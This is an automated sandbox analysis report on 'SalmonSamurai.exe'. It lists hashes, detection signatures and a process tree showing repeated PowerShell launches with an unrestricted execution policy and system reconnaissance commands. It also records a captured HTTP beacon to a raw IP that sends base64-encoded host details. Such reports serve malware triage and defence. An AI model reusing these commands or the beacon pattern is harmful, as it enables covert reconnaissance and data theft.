Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SalmonSamurai.exe

Overview

General Information

Sample name:SalmonSamurai.exe
Analysis ID:1579955
MD5:4ce4a1f912d0b9840a7f568454c6c45a
SHA1:bbf41f3dee85e038f1cb4965269bb0f06b3bb27a
SHA256:83679dfd6331a0a0d829c0f3aed5112b69a7024ff1ceebf7179ba5c2b4d21fc5
Infos:

Detection

Score:45
Range:0 - 100
Whitelisted:false
Confidence:100%

Compliance

Score:33
Range:0 - 100

Signatures

Multi AV Scanner detection for submitted file
AI detected suspicious sample
Drops large PE files
Loading BitLocker PowerShell Module
Abnormal high CPU Usage
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Drops PE files
EXE planting / hijacking vulnerabilities found
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries keyboard layouts
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Console CodePage Lookup Via CHCP
Uses 32bit PE files
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • SalmonSamurai.exe (PID: 6504 cmdline: "C:\Users\user\Desktop\SalmonSamurai.exe" MD5: 4CE4A1F912D0B9840A7F568454C6C45A)
    • SalmonSamurai.exe (PID: 1272 cmdline: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe MD5: 6EA18AE76085155E2681CCA92745A9AF)
      • cmd.exe (PID: 3192 cmdline: C:\Windows\system32\cmd.exe /d /s /c "chcp" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • chcp.com (PID: 7108 cmdline: chcp MD5: 33395C4732A49065EA72590B14B64F32)
      • cmd.exe (PID: 4476 cmdline: C:\Windows\system32\cmd.exe /d /s /c "echo %COMPUTERNAME%.%USERDNSDOMAIN%" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 6672 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 3864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 2932 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 5788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 5820 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 6984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • SalmonSamurai.exe (PID: 3052 cmdline: "C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\jwsvgxfvwjmqrcpj" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAABgAAAAAAAAAGAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1836 --field-trial-handle=1840,i,2950987413084556284,14321838366694710053,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2 MD5: 6EA18AE76085155E2681CCA92745A9AF)
      • SalmonSamurai.exe (PID: 6340 cmdline: "C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\jwsvgxfvwjmqrcpj" --mojo-platform-channel-handle=2072 --field-trial-handle=1840,i,2950987413084556284,14321838366694710053,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8 MD5: 6EA18AE76085155E2681CCA92745A9AF)
      • cmd.exe (PID: 5184 cmdline: C:\Windows\system32\cmd.exe /d /s /c "findstr /C:"Detected boot environment" "%windir%\Panther\setupact.log"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • findstr.exe (PID: 6528 cmdline: findstr /C:"Detected boot environment" "C:\Windows\Panther\setupact.log" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
      • powershell.exe (PID: 3584 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 3084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 1640 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 3284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 3176 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 3408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 1104 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 1808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 3588 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 5336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 3904 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 5212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 5268 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 6656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 3300 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 3132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 4192 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 6476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 2920 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 5296 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 5812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 6184 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 1720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 5672 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 4320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 6284 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 2256 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 6592 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 6680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 2032 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 6932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: Change PowerShell Policies to an Insecure Level
Source: Process startedAuthor: frack113: Data: Command: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -, CommandLine: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe, ParentImage: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe, ParentProcessId: 1272, ParentProcessName: SalmonSamurai.exe, ProcessCommandLine: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -, ProcessId: 6672, ProcessName: powershell.exe
Sigma detected: Console CodePage Lookup Via CHCP
Source: Process startedAuthor: _pete_0, TheDFIRReport: Data: Command: chcp, CommandLine: chcp, CommandLine|base64offset|contains: r), Image: C:\Windows\System32\chcp.com, NewProcessName: C:\Windows\System32\chcp.com, OriginalFileName: C:\Windows\System32\chcp.com, ParentCommandLine: C:\Windows\system32\cmd.exe /d /s /c "chcp", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3192, ParentProcessName: cmd.exe, ProcessCommandLine: chcp, ProcessId: 7108, ProcessName: chcp.com
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -, CommandLine: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe, ParentImage: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe, ParentProcessId: 1272, ParentProcessName: SalmonSamurai.exe, ProcessCommandLine: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -, ProcessId: 6672, ProcessName: powershell.exe

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for submitted file
Source: SalmonSamurai.exeReversingLabs: Detection: 30%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.5% probability
Source: C:\Users\user\Desktop\SalmonSamurai.exeEXE: C:\Users\user\AppData\Roaming\NsisExtracted\resources\elevate.exeJump to behavior
Source: C:\Users\user\Desktop\SalmonSamurai.exeEXE: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeEXE: powershell.exeJump to behavior

Compliance

barindex
EXE planting / hijacking vulnerabilities found
Source: C:\Users\user\Desktop\SalmonSamurai.exeEXE: C:\Users\user\AppData\Roaming\NsisExtracted\resources\elevate.exeJump to behavior
Source: C:\Users\user\Desktop\SalmonSamurai.exeEXE: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeEXE: powershell.exeJump to behavior
Uses 32bit PE files
Source: SalmonSamurai.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Creates license or readme file
Source: C:\Users\user\Desktop\SalmonSamurai.exeFile created: C:\Users\user\AppData\Roaming\NsisExtracted\LICENSE.electron.txtJump to behavior
PE / OLE file has a valid certificate
Source: SalmonSamurai.exeStatic PE information: certificate valid
Contains modern PE file flags such as dynamic base (ASLR) or NX
Source: SalmonSamurai.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Binary contains paths to debug symbols
Source: Binary string: ystem.Core.pdb source: powershell.exe, 0000000D.00000002.2286461966.000001F01D4BC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\dll\System.Core.pdb source: powershell.exe, 0000000E.00000002.2131359909.0000015DDA2DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.Powershell.PSReadline.pdbY source: powershell.exe, 0000000E.00000002.2289613661.0000015DF2550000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 0000000E.00000002.2131359909.0000015DDA2F2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Runtime.Serialization.Formatters.Soape.pdb` source: powershell.exe, 0000000E.00000002.2131359909.0000015DDA2F2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdbt.Automation.pdb source: powershell.exe, 0000000E.00000002.2289613661.0000015DF250B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll.pdb source: powershell.exe, 0000000D.00000002.2293902761.000001F01D6C3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: hell.PSReadline.pdb source: powershell.exe, 0000000E.00000002.2131359909.0000015DDA2DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 0000000E.00000002.2289613661.0000015DF2550000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2289613661.0000015DF250B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Runtime.Serialization.Formatters.Soape.pdbk source: powershell.exe, 0000000E.00000002.2131359909.0000015DDA2F2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: lambda_methodCore.pdb% source: powershell.exe, 0000000E.00000002.2289613661.0000015DF250B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: fll\System.Core.pdb source: powershell.exe, 0000000E.00000002.2131359909.0000015DDA2DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 0000000E.00000002.2289613661.0000015DF250B000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeFile opened: C:\Users\userJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeFile opened: C:\Users\user\AppData\Roaming\NsisExtractedJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeFile opened: C:\Users\user\AppData\Roaming\NsisExtracted\resources\app.asarJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeFile opened: C:\Users\user\AppData\Roaming\NsisExtracted\resourcesJump to behavior
Source: Joe Sandbox ViewIP Address: 172.64.41.3 172.64.41.3
Source: unknownTCP traffic detected without corresponding DNS query: 89.187.28.253
Source: unknownTCP traffic detected without corresponding DNS query: 89.187.28.253
Source: unknownTCP traffic detected without corresponding DNS query: 89.187.28.253
Source: unknownTCP traffic detected without corresponding DNS query: 89.187.28.253
Source: unknownTCP traffic detected without corresponding DNS query: 89.187.28.253
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /call.php?api=register&username=cmVwb3J0&userdata=OCBHQl9mYWxzZV9NOE5DMVVfdHJ1ZV9EUFNfWElfV2luZG93cyAxMCBQcm9fMTIzIG1pbnV0ZXMgKDAuMDUgaG91cnMpX0M6XFVzZXJzXGpvbmVzXzA2MTU0NF9qb25lc19XaW5kb3dzX05UX3g2NF8xMC4wLjE5MDQ1X0M6XFVzZXJzXGpvbmVzXEFwcERhdGFcUm9hbWluZ19DOlxVc2Vyc1xqb25lc1xBcHBEYXRhXExvY2FsXFRlbXBfSk9ORVMtUENfX0ludGVsNjQgRmFtaWx5IDYgTW9kZWwgMTQzIFN0ZXBwaW5nIDgsIEdlbnVpbmVJbnRlbF9BTUQ2NF9DOl8yX0M6XFVzZXJzXGpvbmVzXEFwcERhdGFcUm9hbWluZ1xOc2lzRXh0cmFjdGVkXFNhbG1vblNhbXVyYWkuZXhl HTTP/1.1Accept: application/json, text/plain, */*User-Agent: axios/0.27.2Host: 89.187.28.253Connection: close
Source: SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: chttps://www.baidu.com/s?ie={inputEncoding}&wd={searchTerms}https://www.baidu.com/s?ie={inputEncoding}&word={searchTerms}https://www.baidu.com/{google:pathWildcard}/s?ie={inputEncoding}&word={searchTerms}sigs_ssp{google:baseURL}#q={searchTerms}{google:baseURL}search#q={searchTerms}{google:baseURL}webhp#q={searchTerms}{google:baseURL}s#q={searchTerms}{google:baseURL}s?q={searchTerms}https://go.mail.ru/msearch?q={searchTerms}&{mailru:referralID}https://m.so.com/s?ie={inputEncoding}&q={searchTerms}https://m.so.com/index.php?ie={inputEncoding}&q={searchTerms}https://m.sogou.com/web/{google:pathWildcard}?ie={inputEncoding}&keyword={searchTerms}http://searchatlas.centrum.cz/?q={searchTerms}http://hladaj.atlas.sk/fulltext/?phrase={searchTerms}http://isearch.avg.com/search?q={searchTerms}http://search.avg.com/route/?q={searchTerms}&lng={language}https://isearch.avg.com/search?q={searchTerms}https://search.avg.com/route/?q={searchTerms}&lng={language}http://search.babylon.com/?q={searchTerms}http://search.conduit.com/Results.aspx?q={searchTerms}http://www.delfi.lt/paieska/?q={searchTerms}http://www.delta-search.com/?q={searchTerms}http://www1.delta-search.com/home?q={searchTerms}http://www1.delta-search.com/?q={searchTerms}http://www2.delta-search.com/home?q={searchTerms}http://www2.delta-search.com/?q={searchTerms}http://www.search.delta-search.com/home?q={searchTerms}http://www.search.delta-search.com/?q={searchTerms}http://www.yhs.delta-search.com/home?q={searchTerms}http://www.yhs.delta-search.com/?q={searchTerms}http://mixidj.delta-search.com/home?q={searchTerms}http://mixidj.delta-search.com/?q={searchTerms}http://search.goo.ne.jp/web.jsp?MT={searchTerms}&IE={inputEncoding}http://search.goo.ne.jp/sgt.jsp?MT={searchTerms}&CL=plugin&FM=json&IE={inputEncoding}http://search.iminent.com/SearchTheWeb/v6/1033/homepage/Default.aspx#q={searchTerms}http://search.iminent.com/SearchTheWeb/v6/1033/homepage/Result.aspx#q={searchTerms}http://start.iminent.com/?q={searchTerms}http://start.iminent.com/StartWeb/1033/homepage/#q={searchTerms}http://search.incredibar.com/?q={searchTerms}http://mystart.incredibar.com/?search={searchTerms}https://www.neti.ee/cgi-bin/otsing?query={searchTerms}&src=webhttps://www.neti.ee/api/suggestOS?suggestVersion=1&suggestQuery={searchTerms}https://nova.rambler.ru/search?query={searchTerms}https://nova.rambler.ru/suggest?v=3&query={searchTerms}http://www.search-results.com/web?q={searchTerms}http://search.snap.do/?q={searchTerms}http://feed.snapdo.com/?q={searchTerms}http://feed.snap.do/?q={searchTerms}http://en.softonic.com/s/{searchTerms}http://www.softonic.com/s/{searchTerms}http://www.softonic.com.br/s/{searchTerms}http://buscador.softonic.com/?q={searchTerms}http://nl.softonic.com/s/{searchTerms}https://search.softonic.com/?q={searchTerms}https://en.softonic.com/s/{searchTerms}https://www.softonic.com/s/{searchTerms}https://www.softonic.com.br/s/{searchTerms}https://buscador.softonic.com/?q={searchTerms}https://nl.softonic.com/s/{s
Source: global trafficDNS traffic detected: DNS query: chrome.cloudflare-dns.com
Source: unknownHTTP traffic detected: POST /dns-query HTTP/1.1Host: chrome.cloudflare-dns.comConnection: keep-aliveContent-Length: 128Accept: application/dns-messageAccept-Language: *User-Agent: ChromeAccept-Encoding: identityContent-Type: application/dns-message
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 23 Dec 2024 16:06:02 GMTContent-Type: text/htmlContent-Length: 162Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://ak.apnstatic.com/media/images/favicon_search-results.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://ak.apnstatic.com/media/images/favicon_search-results.icohttp://dts.search-results.com/sr?lng=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://arianna.libero.it/search/abin/integrata.cgi?query=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://autocomplete.nigma.ru/complete/query_help.php?suggest=true&q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://buscador.terra.es/Default.aspx?source=Search&ca=s&query=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://buscador.terra.es/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://buscador.terra.es/favicon.icohttp://buscador.terra.es/Default.aspx?source=Search&ca=s&query=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://buscar.terra.com.ar/Default.aspx?source=Search&ca=s&query=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://buscar.terra.com.ar/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://buscar.terra.com.ar/favicon.icohttp://buscar.terra.com.ar/Default.aspx?source=Search&ca=s&que
